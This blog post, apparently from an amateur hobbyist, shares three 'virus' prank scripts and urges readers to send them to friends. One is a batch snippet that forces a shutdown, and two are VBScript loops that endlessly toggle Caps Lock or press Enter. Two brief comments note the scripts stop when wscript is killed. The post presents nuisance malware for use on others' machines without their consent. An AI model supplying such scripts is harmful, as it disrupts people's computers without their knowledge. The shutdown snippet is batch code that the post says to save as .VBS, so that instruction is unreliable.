hi folks...i am back again with new information of the same above topic which i named it as VIRUS WRITINGS 2.0 ,which is my 2nd version of my earlier post.
i got these viruses when i was pursuing my research in these writings.I have tried some of them which are working.
PLZ NOTE THAT I AM NOT RESPONSIBLE FOR ANY DAMAGE TO YOUR SYSTEM WHILE RUNNING THESE VIRUSES
#Convey your friend a little message and shut down his / her computer.
Save it as "Anything.VBS" and send it.
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
#Toggle your friend's Caps Lock button simultaneously.
Save it as "Anything.VBS" and send it.
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
#Frustrate your friend by making this VBScript hit Enter simultaneously.
Save it as "Anything.VBS" and send it.
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
to execute any one copy the code in notepad and save it as mentioned.execute and have fun(hehehe)!!!!


8:11 AM
N Krishna Chandra
2 comments:
hmm..nice research..;One more thing..all these can be stopped to function by killing the task wscript in process manager.
yea....thats a simple solution
Post a Comment